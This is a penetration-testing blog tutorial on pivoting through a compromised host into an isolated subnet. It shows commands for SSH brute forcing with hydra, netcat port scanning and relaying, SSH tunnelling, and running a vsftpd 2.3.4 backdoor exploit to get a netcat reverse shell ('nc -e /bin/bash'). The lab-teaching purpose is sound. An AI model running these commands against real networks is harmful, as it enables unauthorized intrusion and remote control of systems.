3 minute read

Hello, cybersecurity enthusiasts and white hackers!

pivoting 1

This article will consider scenarios for attacking protected segments of a corporate network using pivoting techniques. I will focus on a practical example.


Pivoting is a technique by which access is organized to those networks to which we do not have access under normal circumstances and obtained using compromised computers. Network isolation will be useless if we compromise a host that has access to all isolated subnets. Thus, an attacker can use the routing capabilities of a compromised machine to access internal corporate resources.

I will show with an example how an attacker can gain access to a “hidden” network without having direct access to it in the early stages of penetration testing using pivot techniques.


Let’s consider at this network topology:

pivoting 1

enum and compromise machine A

Firstly, scan ports:

nmap -Pn -sV

machine A 1

As you can see SSH port 22 is open.

Let’s go to brute via hydra:

hydra -f -v -V -l root -P rockyou-15.txt -s 22 ssh:// -t 2

machine A 2

ssh port forward

Check network interfaces on machine A:


machine A 3

As you can see we discover another network

Further, according to the scenario, the attacker wants to gain access to the subnet behind the interface. To do this, he needs to use a compromised host as a pivot.

In a compromised host, we cannot use nmap for port scanning, so use netcat:

nc -zv -w1 1-100

machine A 4

then banner grabbling via netcat:

nc 21

machine A 5

We found a vulnerable 21 port:


for exploitation we use ssh tunnel:

ssh -L -L root@

machine A 6

So what we do in here? We forwarded ports from attacker’s machine to victim machine B via compromised machine A -

SSH tunnel

Why 6200 port? Because, backdoor use this port.

exploit and access machine B

For exploitation machine B with address, we’ll download python exploit for vsftpd 2.3.4 backdoor:

Download and run:

python3 vsftpd_234_exploit.py 8021 whoami

machine B 1

It’s ok, but we cannot start the reverse shell because we do not have a reverse route.

create back port forwarding for our reverse shell.

on machine A run:

nc -l -p 3333 -c "nc 3333"

machine B 2

and prepare listener on attacker machine:

nc -nlvp 3333

machine B 3

So what we do in here? Port forwarding is one of the basic steps during tunneling. This technique is used when the service within the detected network is not directly accessible. This is because our routing is unidirectional. We know how to access the internal service, but the service does not have an appropriate route to the attacker’s machine. Therefore, we will redirect the all incoming connections to 3333 port from machine A to attacker’s machine (on 3333 port):

netcat forward

on attacker machine run exploit with netcat reverse shell:

python3 vsftpd_234_exploit.py 8021 "nc -e /bin/bash 3333"

machine B 4


check our listener:

machine B 5

machine B 6

So, the machine B has been pwned :)


The attacker discovered secret network by following the steps below:

  • attacker got an access to the machine A ( which was on same network with attacker via brute SSH via hydra
  • then he realise that machine A has 2 network interfaces
  • scan ports on machine B via nc from machine A
  • then attacker banner grabbling on port 21 on machine B with IP address
  • machine B have vulnerable vsftpd 2.3.4 on port 21
  • reverse port forward via nc on A for back connect from B to attacker machine
  • successfully exploitation of vsftpd 2.3.4 via python exploit - create reverse shell via 3333 port
  • final

In the next part I will go to consider an example which use proxychains and metasploit for pivoting.

This is a practical case for educational purposes only.

Thanks for your time, happy hacking and good bye!
PS. All drawings and screenshots are mine